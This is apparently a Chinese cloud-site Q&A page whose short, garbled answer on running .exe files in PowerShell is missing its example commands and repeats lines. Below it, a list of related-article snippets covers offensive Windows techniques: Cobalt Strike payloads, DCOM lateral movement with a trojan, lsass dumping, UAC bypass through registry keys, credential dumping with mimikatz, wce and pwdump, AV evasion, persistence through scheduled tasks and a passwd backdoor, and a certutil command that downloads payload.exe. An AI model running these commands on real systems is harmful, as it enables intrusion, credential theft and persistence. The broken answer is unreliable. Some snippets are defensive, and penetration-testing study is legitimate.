如何在powershell中使用新的.exe执行命令

在PowerShell中使用新的.exe执行命令，可以通过以下步骤实现：

打开PowerShell终端：在Windows操作系统中，可以通过在开始菜单中搜索"PowerShell"来打开PowerShell终端。
确定要执行的.exe文件路径：首先，你需要确定要执行的.exe文件的路径。可以使用cd命令切换到.exe文件所在的目录，或者直接提供完整的文件路径。
执行命令：在PowerShell终端中，使用以下命令来执行.exe文件：
执行命令：在PowerShell终端中，使用以下命令来执行.exe文件：
注意，.\表示当前目录，所以这个命令会在当前目录下查找并执行指定的.exe文件。
传递参数：如果需要向.exe文件传递参数，可以在命令中添加参数。例如：
传递参数：如果需要向.exe文件传递参数，可以在命令中添加参数。例如：
这里的-param1和-param2是.exe文件定义的参数名称，value1和value2是对应的参数值。

需要注意的是，PowerShell中使用新的.exe执行命令可能会受到执行策略的限制。如果遇到权限问题，可以尝试以管理员身份运行PowerShell终端或者修改执行策略。

关于PowerShell的更多信息和用法，你可以参考腾讯云的产品介绍页面：PowerShell。

相关·内容

如何在windows下和linux下获取文件(如exe文件)的详细信息和属性

程序员都很懒，你懂的！...最近在项目开发中,由cs开发的exe的程序，需要自动升级，该exe程序放在linux下，自动升级时检测不到该exe程序的版本号信息，但是我们客户端的exe程序需要获取服务器上新程序的版本号信息。...最后由我用java实现linux上exe文件的版本号读取功能。...java.io.FileNotFoundException; import java.io.IOException; import java.io.RandomAccessFile; /** * @see 获取文件信息的工具类...点击下载详细的演示项目：http://download.csdn.net/detail/xmt1139057136/7335155

5.9K3 0

如何在keras中添加自己的优化器(如adam等)

本文主要讨论windows下基于tensorflow的keras 1、找到tensorflow的根目录如果安装时使用anaconda且使用默认安装路径，则在 C:\ProgramData\Anaconda3...若并非使用默认安装路径，可参照根目录查看找到。 2、找到keras在tensorflow下的根目录需要特别注意的是找到keras在tensorflow下的根目录而不是找到keras的根目录。...在后一种情况下，将使用优化器的默认参数。...# 传入优化器名称: 默认参数将被采用 model.compile(loss=’mean_squared_error’, optimizer=’sgd’) 以上这篇如何在keras中添加自己的优化器...(如adam等)就是小编分享给大家的全部内容了，希望能给大家一个参考。

44.9K3 0

CS学习笔记 | 10、如何管理Payload载荷

shell：通过受害主机的 cmd.exe 执行命令。比如运行ipconfig，就需要输入shell ipconfig run：不使用 cmd.exe 执行命令。...powershell：通过受害主机的 PowerShell 执行命令。...比如想在 PowerShell 下运行 ipconfig，就需要输入powershell ipconfig powerpick：不使用 powershell.exe 执行 powershell 命令。...直接运行 powershell-import + 脚本文件路径即可，但是这个脚本导入命令一次仅能保留一个 PowerShell 脚本，再导入一个新脚本的时候，上一个脚本就被覆盖了，因此可以通过导入一个空文件来清空...为了更好的隐蔽性，可以找到更合适的程序（如 Internet Explorer）并使用spawnto命令来说明在派生新会话时候会使用 Beacon 中的哪个程序。

1.9K3 0

PowerShell 的命令行启动参数（可用于执行命令、传参或进行环境配置）

我们都知道如何在命令行或各种终端中启动一个程序，但是当你需要自动启动这个程序的时候，你就需要知道如何通过 PowerShell 或其他命令行终端来启动一个程序，而不是手工输入然后回车运行了。...比如下面的 FRP 反向代理程序：借助 cmd.exe 来启动的方法可以参见我的另一篇博客： cmd.exe 的命令行启动参数（可用于执行命令、传参或进行环境配置） - 吕毅那么我们如何能够借助于...关于 .NET Core 版本的 PowerShell Core 可以参见我的另一篇博客：安装和运行 .NET Core 版本的 PowerShell - 吕毅接下来输入下面三个命令中的任何一个：...你就可以看到 PowerShell 的使用说明： PowerShell 的启动参数示例使用 PowerShell 间接启动一个程序并传入参数下面的命令，使用 PowerShell 间接启动 frpc.exe...使用 PowerShell 执行命令/脚本后保留窗口不退出需要加上 -NoExit 参数。 1 > pwsh -NoExit -c "D:\walterlv\frpc.exe -c .

1.8K3 0

内网渗透测试：利用DCOM进行横向渗透

（powershell命令行）默认只在powershell 3.0以上版本中存在，所以只有 Windows server 2012 及以上版本的操作系统才可以使用Get-Ciminstance。...使用DCOM对远程主机执行命令 下面通过几个实验来演示如何使用DCOM在远程主机上面执行命令。在使用该方法时，需要具有以下条件：具有管理员权限的PowerShell 可能需要关闭目标系统的防火墙。...然后在Windows7跳板机上传一个新的metasploit木马程序shell.exe，并控制Windows7使用copy命令将shell.exe复制到Windows Server 2008的c盘上面去...") （5）调用Visio.Application远程执行命令 使用条件：目标主机中安装有Visio。...远程执行命令 使用条件：目标主机中安装有Outlook。

2.6K2 0

内网渗透之DCOM横向移动

DCOM使用远程过程调用（RPC）技术将组件对象模型（COM）的功能扩展到本地计算机之外，因此，在远程系统上托管COM服务器端的软件（通常在DLL或exe中）可以通过RPC向客户端公开其方法攻击者在进行横向移动时...，如果要在远程系统中执行命令或Payload,除了会使用at、schtasks、Psexec、WMI、smbexec、Powershell、通过Office应用程序以及包含不安全方法的其他Windows...加载powershell拓展，以便使用powershell命令 ?...调用Visio.Application远程执行命令 适用条件：目标主机中安装有Visio # 通过PowerShell与DCOM进行远程交互，创建Visio.Application对象的实例: $com...启用基于主机的防火墙可以阻止RPC/DCOM交互及实例化操作； 4、监控文件系统（以及注册表），关注新引入的元素以及改动； 5、监控环境中可疑的PowerShell操作。

2.2K2 0

如何使用CIMplant收集远程系统中的数据并执行命令

注意：某些命令仍然会使用PowerShell与WMI结合的方式来实现。...CIMplant使用了C#对@christruncer的WMImplant项目进行了重写和功能扩展，可以帮助广大研究人员从远程系统中收集数据、执行命令以及提取数据等等。...该工具允许使用WMI或CIM来进行连接，并且需要目标系统中中的本地管理员权限来执行任务操作。...“Build”，然后选择构建解决方案；工具使用 CIMplant.exe --help CIMplant.exe --show-commands CIMplant.exe --show-examples...通常，WMI使用DCOM作为通信协议，而CIM使用的是WSMan（或WinRM）。对于DCOM，我们可以做的第一件事是通过端口135寻找初始TCP连接。然后，连接和接收系统将决定使用一个新的端口。

1.2K3 0

黑客在 Log4j 攻击中使用新的 PowerShell 后门

据观察，被认为是伊朗 APT35 国家支持组织（又名“迷人小猫”或“磷”）的一部分的黑客利用 Log4Shell 攻击来释放新的 PowerShell 后门。...一直在跟踪这些尝试的 Check Point 将利用活动归因于 APT35，因为威胁行为者的攻击是使用该组织已知使用的先前暴露的基础设施仓促设置的。...用于多项任务的模块化后门对 CVE-2021-44228 的利用会导致运行带有 base64 编码负载的 PowerShell 命令，最终从参与者控制的 Amazon S3 存储桶中获取“CharmPower...存储桶中。...命令执行- 具有 Invoke-Expression、cmd 和 PowerShell 选项的远程命令执行模块。清理- 删除受感染系统中留下的所有痕迹的模块，例如注册表和启动文件夹条目、文件和进程。

7K1 0

远程dump lsass.exe内存并解析

本文主要是介绍lsassy的使用和一些原理理解。远程dump lsass.exe内存并解析使用lsassy可以对远程机器进行自动化的lsass.exe内存dump和解析，利用过程如下： ?...该工具还提供了一个CrackMapExec的模块： ? 那我们解析来分析下原理。原理分析首先我们来看下lsassy是如何在对方机器上执行命令的，我们看下其目录： ?...第二，我们需要看下如何dump进程的，分析代码，发现是利用两种方法： 1、 powershell.exe -NoP -C "C:\Windows\System32\rundll32.exe C:\Windows...第三，我们看下他的CrackMapExec的模块，发现实际上还是直接调用了他自己： ?...那我们就顺手说说利用wmi远程执行命令的几种手段： 1、 wmic /user:"jumbolab.com\win7user" /password:"aA1234567890000" /node:172.16.127.184

2.7K2 0

利用注册表键值Bypass UAC

下一步使用Process Monitor来分析fodhelper.exe是调用HKCU\Software\Classes\mscfile\shell\open\command并执行命令，在开始之前首先要在...使用Powershell中的New-Item命令就可以在指定注册表中创建一个新的键，使用命令New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open...-Force在Default中写入命令，来开启一个新的命令提示符。...\Classes\exefile\shell\open\command中的 default的内容当做命令执行，汇总成Powershell脚本代码，如代码清单4-22 所示，执行结果如图1-8所示。...可以在default值中设置启动程序，在Powershell中运行代码清单4-23所示代码，执行结果如图1-9所示，虽然像这种注册表的Bypass UAC还有很多，不过大部分都只能针对Windows 10

3981 0

DNS劫持欺骗病毒“自杀”

在系统磁盘下windows目录下发现多个随机命名的exe文件，以及mimikatz的运行日志文件，包括powershell文件。发现中毒后第一时间使用杀毒软件清理病毒，简单粗暴！...病毒利用powershell远程下载一段新的powershell代码执行，这里会定时下载新的病毒文件执行挖矿并开始蠕虫式传播。...powershell代码会通过服务端下载新的病毒执行，并添加后门powershell到任务计划，对于生成的exe病毒文件只需要杀毒软件就可以轻松解决，但是powershell的计划任务却被遗漏导致无法清理彻底...DNS劫持欺骗“自杀” 如何在上百台中毒机器中高效删除所有机器的病毒呢？...因为web服务的页面已经替换成了我们自己写的ps，那么ps脚本就会自动被病毒执行，测试一台中毒的服务器，直接执行计划任务中病毒的执行命令即可触发看到效果，下图成功删除计划任务。 ?

2.4K3 0

window下抓取密码总结

测试一下抓取本地用户密码: 执行命令:lazagne.exe windows,成功获取到用户密码: ?...-d 从登录会话中删除NTLM凭据参数:； -a 使用地址参数: ； -f 强制使用安全模式 -g 生成LM和NT的哈希参数 -f 强制使用安全模式；希参数；...； (2)、抓取用户的明文密码: 执行命令:Wce.exe -w ?...(3)、抓取hash值: 执行命令wce.exe -l ? 如果不想把抓取的密码或者hash值显示在dos界面上，也可以保存在txt文档中，比如：wce.exe -w > hash.txt ?...这款工具使用比较方便，直接在dos命令中执行pwdump7.exe，就可以直接抓取密码，如.不愿意输出到桌面，可以执行pwdump7.exe > hash.txt。 ?

2.1K4 0

Spring在无RedirectAttributes的情况下（如Interceptor中）使用Flash scope

今天遇到一个应用场景：在需要在自定义的Interceptor中判断用户密码是否过期，如果过期，则重定向到修改密码页，强制修改密码，同时给出提示：“您的密码已过期，请修改密码” 判断逻辑很简单，但是重定向的时候需要前台有消息提示...，如果是在Controller中，可以在方法上注入RedirectAttributes参数，但是Interceptor中默认没有这个参数，那么我们如何实现RedirectAttributes的flashMessage

5.4K1 0

权限维持分析及防御

当设定的条件被满足时，系统将自动启动Powershell进程去执行后门程序，执行后进程将会消失，达到所谓的“无进程” Empire下有WMI相关的模块可以使用 usemodule powershell/...进程中，就能够获取lsass.exe进程中的明文密码，这样即使用户更改的密码并重新登陆，依然可以获取（1）方法一是使用mimikatz将伪造的SSP注人内存，重启就丢失 //注销用户 ....\mimikatz.exe "privilege::debug" "misc::memssp" exit //注销之后执行命令查看明文密码 powershell.exe cat c:\windows\system32...powershell.exe cp ....SID History属性实现持久化，可以在mimikatz中执行命令sid::clear /sam:usemame清除SID History属性 SID History域后门的防御措施如下：经常查看域用户中

9921 0

【专业技术】如何在Linux中添加新的系统调用

Linux操作系统作为自由软件的代表，它优良的性能使得它的应用日益广泛，不仅得到专业人士的肯定，而且商业化的应用也是如火如荼。...在Linux中，大部分的系统调用包含在Linux的libc库中，通过标准的C函数调用方法可以调用这些系统调用。那么，对Linux的发烧友来说，如何在Linux中增加新的系统调用呢？ ?...该数组包含指向内核中每个系统调用的指针。这样就在数组中增加了新的内核函数的指针。.../src/linux/arch/i386/boot/bzImage　（4）用新的内核启动系统要使用新的系统调用，需要用重建的新内核重新引导系统。...（5）使用新的系统调用　　在应用程序中使用新添加的系统调用mycall。同样为实验目的，我们写了一个简单的例子xtdy.c。

2.3K4 0

实战中如何绕过杀软用mimikatz获取账号密码

mimikatz的exe,powershell版（可上github下载）网上版本已经被360已及各种杀软杀的死死的，扔上去就挂 ?...所以采用混淆加密方式来绕过杀软，混淆脚本地址如下 https://github.com/the-xentropy/xencrypt 使用AES加密和Gzip / DEFLATE压缩，每次调用都会生成一个唯一但是功能相同的脚本...它通过压缩和加密输入脚本并将此数据作为有效载荷存储在新脚本中来实现免杀，输出脚本将在运行有效载荷之前对其进行解密和解压缩。使用方法 Import-Module ....既然可以远程加载powershell绕过杀软，那远程加载exe也同样可以，powershell加载exe进内存运行需要PowerSploit中的Invoke-ReflectivePEInjection脚本..." -ForceASLR -PEUrl ：包含要加载和执行的DLL / EXE的URL -ExeArgs ：所要执行命令 ?

1.7K2 0

网络安全渗透之主机持久化

手工创建计划任务如：计划任务名称为zhi，1分钟后以system权限运行calc.exe schtasks /create /sc minute /mo 1 /tn zhi /tr "C:\Windows...侧写每当用户运行 PowerShell.exe 的时候，PowerShell 侧写文件会被加载。...我们可以通过执行命令 $Profile | select* 来查询所有的 PowerShell 侧写，共有 4 个可能的位置： C:\Windows\System32\WindowsPowerShell...我们可以在该文件中写入一个计划任务，例如执行命令 touch /tmp/crontab，那么我们在末尾添加 * * * * * root touch /tmp/crontab，保存，等候一分钟，如果以特定用户创建计划任务...，我们可以使用 crontab-e 命令来编辑 passwd 与 shadow 我们可以在 /etc/passwd文件中写入一个后门 root 账户，密码我们可以借助 openssl生成。

6262 0

某远控RCE绕过某数字的利用方式

0x01 前言群友在某次项目测试中遇到一个存在向日葵远程命令执行漏洞的IP，目标环境Windows2016+360+Wdf，由于存在360而无法通过向日葵漏洞利用工具执行命令进行下一步测试。.../windows/system32/windowspowershell/v1.0/powershell.exe+whoami 0x03 问题复现测试了Github上大部分的向日葵利用工具，在执行命令时都被.../Windows\System32\cmd+/c+dir+c:\ 0x04 解决方案我们只需将向日葵利用工具源码中的命令执行方式改为cmd /c，这样就能完美解决在执行命令时被360拦截的问题。...注：CS/MSF自带的hta里还有一层Powershell，执行会拦Powershell.exe，利用工具卡死，强制结束后就不能再执行任何命令了，这啥原理我也不知道，只是发现里边已经运行了一个ms.exe...如果目标主机的向日葵为自定义路径安装，那么我们该如何得到他的安装路径去读取config配置文件呢？可以使用sc qc命令查询向日葵服务得到安装路径，或者读取向日葵服务对应的注册表项。

1.4K1 0

D盾防火墙防护绕过-

2.5K2 0

记录一次从弱口令到远程登陆

然后执行命令，就没有报错了，我们执行命令也要记得base64编码一下 ?...既然可以执行命令，我这里尝试了hta上线和powershell上线，可能因为机器是腾讯云的缘故给我拦截了，于是请教了3h师傅，他和我说可以使用Windows系统中的Certutil/Bitsadmin/...Powershell等命令来下载文件，命令是3h师傅整理的，在这里贴出来。...\Microsoft\CryptnetUrlCache\Content 下载文件： certutil -urlcache -split -f http://192.168.1.108/payload.exe...总结：内网这块是3h师傅负责打的，思路很明确，当初在命令执行的时候考虑过直接创建用户，但是失败了就没再考虑，能执行系统命令的时候可以使用Windows自带的文件来下载工具，如目标有杀软时请自行做下免杀处理

1.1K3 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云